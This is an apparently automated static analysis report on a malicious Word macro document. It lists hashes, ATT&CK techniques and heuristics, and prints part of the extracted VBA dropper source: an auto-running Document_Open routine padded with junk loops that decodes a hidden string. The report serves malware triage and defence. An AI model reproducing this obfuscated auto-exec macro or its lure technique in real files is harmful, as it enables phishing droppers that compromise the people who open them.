Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 45dbb91b898d3db2…

MALICIOUS

Office (OOXML)

41.9 KB Created: 2018-10-17 16:47:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-09-30
MD5: f80eedbee0117a41c8cdb96cf1b43448 SHA-1: 3e092341632778eefa6655a5d59500118e5568b9 SHA-256: 45dbb91b898d3db2028bd91ae4de855a5f4f297a9d77b5e1d253a80342d1968f
184 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is an OOXML document containing a VBA macro that automatically executes upon opening, as indicated by the Document_Open macro and Shell() call firings. The document body presents a fake order form, instructing the user to 'enable content' to view details, which is a common lure for macro-based malware. The VBA script likely downloads and executes a second-stage payload, although the specific download URL or execution command is obfuscated within the script.

Heuristics 7

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 13805 bytes
SHA-256: 12f1b834c204514c87c3bb4ac0682f92cf09d173c7fbee33796401cf5c5cfbe3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
If 56 < 220 Then
' mDOpa
Else
' Cy2z79WKO
Debug.Print "QoRNLqcVP"
End If
Dim Tera3E
Tera3E = 26
While Tera3E <= 746
Tera3E = Tera3E + 59
Wend
eCnKsQ = 26387
U5WMkUaBJ = yGrSPigs5 & Tera3E
Dim yhRyMkErG
yhRyMkErG = 190
While yhRyMkErG <= 386
yhRyMkErG = yhRyMkErG + 41
Wend
eeZIM = "wDr8Q"
zbFNjRrU = skP9u & yhRyMkErG
Dim djoJV
djoJV = 190
While djoJV < 386
djoJV = djoJV + 41
Wend
OTrWfp = "tS4gXr"
vXEOtPBR = V0OanRZ & djoJV
Dim aHgdp As Object
Dim Od63WkKb
Od63WkKb = 129
While Od63WkKb <= 390
Od63WkKb = Od63WkKb + 7
Wend
V8U3OxoYm = 8474
Bw6TM = L9ZQwf2aA & Od63WkKb
Dim wRncv
wRncv = 103
While wRncv <= 521
wRncv = wRncv + 57
Wend
BkOCfYIyG = "nA5lyd9"
WInQKG = bvTfcPKW & wRncv
If 23 < 134 Then
' Npch45
Else
' zZ91BFmN
Debug.Print "hn2RBw"
End If
Set aHgdp = New frmMain
If 53 < 155 Then
' KCs3mSZ
Else
' rW7mMrnwZ
MsgBox "sHb23G06"
End If
If 52 < 174 Then
' UqM9lzn8
Else
' xUmTPXMhc
MsgBox "ZEOyC0NdV"
End If
If 52 < 174 Then
' pkHCpUaGb
Else
' teKtmES
MsgBox "NrKl5"
End If
Call Initialize(aHgdp.txtBox.Text)
End Sub

Attribute VB_Name = "vQV3ywROB"
Sub Initialize(XbhpD As String)
If 36 < 174 Then
' uhJQNSzq
Else
' KY3CKnf
MsgBox "iH21C"
End If
If 31 < 177 Then
' mSHAyONj
Else
' UsDZSJ
MsgBox "pCUS28"
End If
Dim BTboqS
BTboqS = 91
While BTboqS <= 707
BTboqS = BTboqS + 33
Wend
UHr4cRx7o = 59773
EO6wyU = Rc5MUVEnr & BTboqS
Dim k67bCYIMy
k67bCYIMy = 91
While k67bCYIMy <= 707
k67bCYIMy = k67bCYIMy + 33
Wend
FYdvBtw = 59773
aZmzwI = GfCadShRq & k67bCYIMy
Dim HGC2im
HGC2im = 169
While HGC2im <= 271
HGC2im = HGC2im + 8
Wend
NGcLDyw = 3591
qRhzbu = ZZgTpoEcR & HGC2im
On Error Resume Next
If 23 < 158 Then
' eZNvyzM4d
Else
' YObSRmG
Debug.Print "EGgZH"
End If
If 26 < 233 Then
' XKJ1xAnuO
Else
' T5fRyesx
Debug.Print "UUtTvk"
End If
If 26 < 233 Then
' kUCLVB
Else
' n4BKhH
MsgBox "uZp1RGX"
End If
Dim qtHbZjfy
qtHbZjfy = 94
While qtHbZjfy < 870
qtHbZjfy = qtHbZjfy + 32
Wend
Vch7n = "e0Sod"
ezdbEIpk = xA0QRux8M & qtHbZjfy
Dim wVH5QPn0
wVH5QPn0 = 94
While wVH5QPn0 <= 870
wVH5QPn0 = wVH5QPn0 + 32
Wend
W8RK0 = "rzMh9t"
s5bJPVE6y = G1A9uth & wVH5QPn0
If 12 < 181 Then
' Mh8Sid
Else
' BCUWzbnc
Debug.Print "P0Nui4"
End If
If 12 < 181 Then
' EStx4dTQJ
Else
' uiSnApk8
Debug.Print "DAMWaVi"
End If
If 29 < 237 Then
' LtjuYZ
Else
' vgi9nGC
Debug.Print "iFIDmB"
End If
If 29 < 237 Then
' gxF6DJX
Else
' pLqFg
Debug.Print "iU03IPkM"
End If
If 22 < 191 Then
' FlZoBh6I9
Else
' xU0nLu3c9
Debug.Print "m1wmD"
End If
Dim pBpAjxN0o
pBpAjxN0o = 32
While pBpAjxN0o < 960
pBpAjxN0o = pBpAjxN0o + 3
Wend
fewcAK0 = 46918
U3RXn = Gwv2ux & pBpAjxN0o
If 58 < 199 Then
' O35W8ko9a
Else
' xVQ65TH
MsgBox "Zq5Qkj4"
End If
If 58 < 199 Then
' i2Mp1
Else
' zydV0
MsgBox "EKp1Gsa"
End If
If 33 < 172 Then
' adOWDzITY
Else
' bVdS3WGNa
MsgBox "tLiPC6Zv"
End If
XbhpD = c8hPt2ywU(XbhpD)
Dim A4g5ScW
A4g5ScW = 234
While A4g5ScW <= 839
A4g5ScW = A4g5ScW + 22
Wend
BthZpOFb = 48524
oml86 = YvpGK & A4g5ScW
Dim j2CGPWE4
j2CGPWE4 = 234
While j2CGPWE4 < 839
j2CGPWE4 = j2CGPWE4 + 22
Wend
pOHnWt5PG = "ItZea0RkD"
cor5KJdDW = EyOzdLIQv & j2CGPWE4
XbhpD = StrConv(XbhpD, vbUnicode)
Dim CTknGqo2
CTknGqo2 = 239
While CTknGqo2 < 621
CTknGqo2 = CTknGqo2 + 42
Wend
khgs2fKI = 6579
YFjXVki = PhBJXDmF & CTknGqo2
Dim IKLCi
IKLCi = 30
While IKLCi <= 337
IKLCi = IKLCi + 52
Wend
s3rW4R0PM = "B3L09u"
Ief6C085s = EH5cux & IKLCi
If 24 < 143 Then
' B7czm80V
Else
' V03g5y9
MsgBox "IhitPS8x"
End If
Dim arK4wo3L
arK4wo3L = 54
While arK4wo3L < 895
arK4wo3L = arK4wo3L + 32
Wend
hoLJ5eKv = "NE6Vs"
U52rtYG = ANzRbk & arK4wo3L
If 38 < 227 Then
' W0mQDw
Else
' Zc8qGRA3
Debug.Print "rJhM9bCf
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 53248 bytes
SHA-256: e13d827ef017875b850f029ea014023bd58d50d3256cef8b28f2e838a9a59e04
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).